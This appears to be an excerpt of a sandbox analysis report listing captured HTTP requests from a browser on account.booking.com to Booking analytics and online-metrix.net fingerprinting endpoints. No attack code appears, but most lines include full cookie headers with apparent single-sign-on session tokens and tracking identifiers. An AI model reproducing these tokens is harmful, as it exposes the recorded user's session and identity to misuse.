Source: global traffic	HTTP traffic detected: GET /cONOaUW_MaTaPTQp?8f3bd43aa6e0497f=mxkiJZlKo2wRjNiek2jZRzrl9JXTLq7oVhtCJC5nwvUwLhK_9Uq0McCrlMcWg__-Gw_E7xzFmpdSYn5-UZqd8quKCKbLIchJ-2hYtZvhiPm-6HXb7Vdz8tUj-Y3D7aqj5Y4EuMJjefSnZa3mKTJN4fX-kpw&k=2 HTTP/1.1Host: h.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: thx_global_guid=3d814834cda9479192e2bd1aa5810cad
Source: global traffic	HTTP traffic detected: GET /W2SqRgICpXAWRIgu?510837d40a64aad2=FcpMAQ1TMdbpmfW_SSIDyctuvS8aHe9-5tbbMYfoQ50sp9lUrN3nYvEXF49sr8ZK03DvsHQsfYdYnCJFjp2azCPIWWQtnA54pdPz-TkVX-_unY40fN_mu_VCbvN_qqDrHijN097pL1dLb5sIazfw0GzWqxK_kuulSQKf HTTP/1.1Host: doregtzf6rn426qo26euthu32gkwujtuh4wpvuxu10e9fc93386172a1am1.e.aa.online-metrix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&bbv=3&jac=1&je=3a3624246f67646a352a3125324b30253243392d3041363c336c356d61366364316136613536673b6460383b3c643862323162393632383133313a3b3839336e30666366376564333030603a673539613a616261393129 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=3b3124246863633f39246268737f3d2535422d3f4027354c253a432d30322532447369656c2f6b6c273032273d462662687b6b737465352d3540273a32636e2d3032253343302530412730306930323b2d3032253349302537442e6a60743f3b HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=303231242468616135332662687b633d25354a2d3740273a327c253a3025324327323276677a762730316c6d6f6b6e6e6165652532334c415427303b253a322d304332383a25354627304127374025303a742532322d324331323e3b27304131303f253a4132383827354427304127374027323065662532322d324334393b2d3041303a382d324b303838253043302737462730412735402d30326d752d323225324b3c3b31273a433a3230273243353435253041322737462735462e6068736357696e646570353224606a763533 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=303134242468616135332662687b63653d253f4a273030787471706d712532322733412735402730306f6f777b672532322d334132253f4c2730412d323a707c7b70652530322531436c776e6e2737462e60687362633d2535422d3d4027303a5a2d323a2732433627324333353135313a3233323d313831253d442532432d3d4027303a442d323a273243323b32253041273030766778762d30336c6f6f696e6e61656d2730302d354c253a412535422732324727303027304135343d273243253a327465787c2d30316e6767616e66636d65253032253746273746246068716a695f696e6c65783d302e6a60743f3b HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /static/img/favicon.svg HTTP/1.1Host: xx.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=33303624246062743531266a616b3d3126706f6d5d77726c617c6535273742253032302730302731432737402d30326c6f6f696e6e61656d2730302d3349253d4066616c7165253041273030766778762d303225324b322535442d3f4627304b253a3239273232253141253540273030746772273a302533413b253744253f4c HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /uJG23vokgQnONqdB?ae14fd71b07361dc=QqLa1XvNtL3IDPg5hwcH6441n6G3th71NMAKPs37sb-oi88Ezhwben-4ntJlHfu6d-ZKvPmw9Ou-1Q4eIaghjrUJvdnVI4fEULGqEky6ENIRiSv5ZNCNbFV9HiPQFUV_hioiDI56937AWp-BK6pnp4Krr0M&jac=1&je=3330343a2424706f356c6f2662697473743d2d3f4027303a6c6d766d6e253232273341332c323227304125303a717461747d732532322d3b4327303a6360617a65696e6727323227354624637766683f6b676662616d343738363f3f6432306e626a643135333631353639306660663b6134343738606635363c313636396d6a6764333d393d616a353435613031313524677a313f3062606c616633373e646136343a3d37323a3b376a3230343264393539343636636060376765363b2465783435633738373c3a303a63696631323f3630613360663567323b6067643437646b322665783d3d663635393f363a376a6530376b37326261306533606637343a373238643b3a66266a7b6f3d5769666c6d75712d32383138247561683f253740273030637061686b7c676374757a652532322d3b4327303a7830362d3032253241253230606b766c677173273a302533412d323236342d3a3027304b253a326a70616e647125323027314327374025354a273232627a616e64253a3a2731432d323a47676d676c65273230416a706d6f672732302d304325323a7665727361676c27303a253b412d303231313525323027354627304125354a273232627a616e64253a3a2731432d323a4e6776253342432533464070636c662732302d304325323a7665727361676c27303a253b412d303238253032253546273041273542273a3062726166642532322d3b4327303a436072676f69756d2732322730412730307465707b6b6f6e253a322533412d3a3033333f253a322d354425354625324127303064776e6c546d7073696f664c6973742d3a30273149253d422d35422532306272636c662730302733432d3032476f67676c65253a38416a70676d6d253a30253243273232746770716b6d6c25303a273341253a3231313726382c373b3b3826313b302532322737442730412735402732306a70616e642d32322533492d30304c67742d334a432533444072616c66273030273043273a307665727b696f6e253a3a2731432d323a3826322e302e3225323027354627304125354a273232627a616e64253a3a2731432d323a4360706f6d69776d253030273041273032746d7073696f66253232253b4927303039313f2e382c3539333a2e313130273030273544273d462532432d32326d6f6a616e67273a322d334964616c73672532412730306f6d66656e2d3032253349253232253a3a2730412d323a70646374666f706d25303027314327303255616c646f777b253232253a4b273030786c69746e6d726d566772736b6d6c2730302733432d3032313026302e30253a3a2730412d323a776775363425303225314364636e716725354c2475616c35253742253a3a60706366647b253a3025334127354227354027303060726366662532322d334125323a4f6d6d6564652d32384168726f6f65253030273041273032746d7073696f66253232253b4927303039313f253a3025374427324327354027303060726366662532322d334125323a466d76273b4249253b464272616c64253030273041273032746d7073696f66253232253b4927303030253a322d35442532412537402730306070636e662d303225334925323243607a6d6f6b7d6d2d323a273243253032766770716b6d6c2732302d314125323a313137253a3a2735462d354c253a412532326f6f626b6e672730302733436e636c73652d324325323a786e63766e6f7a6d2d3032253343253230556b6c666d7573273a30253744 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Source: global traffic	HTTP traffic detected: GET /static/img/favicon.ico HTTP/1.1Host: xx.bstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&jac=1&je=363b2424606a7376786c3d25374a253232333d382730302d3349312d304325323034333027303027314331273f462662627e3d33 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /WgpnlAqK03mzPOt_?107343fbfcf1eddf=FI3IeDsW6E-9QwvvBU8_DNbq9esirOpDu0wMOFmq0LTq4pESV6rPzScfLEMwUfzOixoSrakoPR2XZH3zycxPjBLn-3wEgQ7TUtNgtfRH_a9Sz1MkmvWJgjeoMVvWPya-UUh_YLUxECYcXizbQGH1mlMD0YDS69Q_M6N6UbTMaPYfPhpOv98R4hV5u-QdkpyLiO66yZMmEIS6KMR5Qjo&jf=36333624716b645d7a6c643d746c725f5037643a4e526b6a6a5d425943496e63247369665d666376673f31353b353338303b30362673616c5d767b786535776d603a656366736124716b665d6967793f3b323539333831333036383f30633a3e3430636d3164303232313034323a30633a34343a6b673364303b30313037383b36303238303c6430323636646039393237673a63363a37373c363333653d666530356a3e6666343f3731333e673530646637333237673336356363366c636630353d34376464313b3366606a643a353d616338373b30633a363a3a33676463613c6664363138373263646b6d6367376e34313331633933373b37316061303263373b326469372673696c5f736967353b32363638323a303f663463373531333164613b3a603731343f643566656c65363534396d3464666e316c666937323430316566303b3a3260643b37353b313962393a6165383630383030323c313d633c3a353164673637343a673636356733313b343939336c616564316b3c3130323e663d616b316332303537356336316130353664336c603665653c612673696e7a3f32 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=333131242468616135332662687b63653d253f4a273030787471706d712532322733412735402730306f6f777b672532322d334132253f4c2730412d323a707c7b70652530322531436c776e6e2737462e60687362633d2535422d3d4027303a472d323a273243313030372730413327374625374c246268736a6b5f696e6c6d7a3f332e626a763531 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
